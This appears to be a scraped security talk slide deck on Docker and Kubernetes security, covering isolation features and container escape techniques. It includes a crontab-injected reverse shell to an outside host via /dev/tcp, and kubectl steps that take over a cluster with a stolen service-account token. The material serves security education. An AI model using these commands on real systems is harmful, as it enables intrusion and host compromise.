Hacking Docker the Easy way

HELLO!
I am Oritz
A web 🐶 & script 👶
Steam 💖 +1
English is bad

Docker Introduction
» Started in 2013
» Written in Go
» Very active codebase (~ 33,000 commits & 44,000 stars )
» Lots of interest from Big Tech Co’s ( e.g. Google/Microsoft/RedHat/IBM )
» Delivering Containers as a Service ( e.g. AWS/GKE/Azure/Aliyun )
» More quickly and flexibility than traditional virtualization

Our process is easy
Docker Security
Overview
Hacking Docker Hacking Container
Management Platform

Docker security Overview
Namespaces, Cgroups, Capabilities and more

Namespaces
Control what a process can see
» PID
» Mount
» Network
» UTS
» IPS
» User
Namespaces & Cgroups
Cgroups
Control what a process can use
» Memory
» CPU
» Devices
» Blkio
» Net_prio
» Freezer
» …

Capabilities
Break up the monolithic root privilege
» Useful for commands that need one privilege
» Docker drops all capabilities except those needed
» By default, a container own only 14 of 37 capabilities
» Docker supports the addition and removal of capabilities
» --privileged flag will give extended privileges to the container
Kernel Capabilities

Seccomp
Control the system calls that a
process can make
The default seccomp profile
provides a sane default for
running containers with
seccomp and disables around 44
system calls out of 300+
Seccomp & Kernel Modules
MAC
Give fine grained control to restrict
access to system resources
» AppArmor
» SELinux
» GRSEC
» TOMOYO
» …

“OK, OK, We have known that docker
is secure. But how to hack docker?
Please show us the exploit.”

Hacking Docker
Kernel, Privilege, Daemon and Registry

Am I in A Container?
» ps aux
» cat /proc/self/attr/current
» cat /.dockerenv
» cat /proc/self/cgroup
» mount
» …

Vulnerabilities in Docker images
» Heart Bleed
» Glibc Ghost
» Shell Shock
» SSL Death Alert
» …

Linux Kernel
Containers share the kernel of the host

DirtyCow
Docker Container Escape PoC
CVE-2016-5195

CaaS Platform
» KVM
» XEN
» Escape From
The Docker
KVM-QEMU
Machine

What privileged flag do
» Set empty process label
» Warn of incompatibility with user namespaces
» Add all host devices from /dev
» Add device cgroup access rwm allow
» Add all capabilities
» Clear read only flag for /sys mount
» Set read only paths to nil (*specs.Spec).Linux.ReadonlyPaths = nil
» Set masked paths to nil (*specs.Spec).Linux.MaskedPaths = nil
» Clear read only flag for cgroup mount
» Set app armor profile "unconfined"

Have a look at /dev
docker run --privileged

Docker Daemon
The docker group grants privileges equivalent to the root user

Docker Remote API
docker daemon -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock

Docker Registry
A server side application that stores and lets you distribute Docker images.

Pull and Push
Download each blob using the API or just run “docker pull xxx.xx/xx”

Hacking Container
Management Platform
Take Kubernetes as an Example

API Server Unauth
myapp.yaml
» kubectl create -f myapp.yaml
» kubectl --namespace=default exec -it myapp bash

Escape Docker
» echo -e "* * * * * root bash -i >& /dev/tcp/1.2.3.4/80
0>&1n" >> /mnt/etc/crontab

Hacking Kubernetes
» kubectl config set-cluster pwned --server=https://${public_ip}
--insecure-skip-tls-verify
» kubectl config set-credentials pwn --token=${serviceacount_token}
» kubectl config set-context pwned --cluster=pwned --user=pwn
» kubectl config use-context pwned

There are more interesting problems yet to be solved with docker

How to find next exploit?
Read the official documents carefully and
Focus on the events of developer community

THANKS!
Any questions?
You can find me at
@oritz
https://0x0d.im

Hacking Docker the Easy way

More Related Content

What's hot (20)

Similar to Hacking Docker the Easy way (20)

Recently uploaded (20)

Hacking Docker the Easy way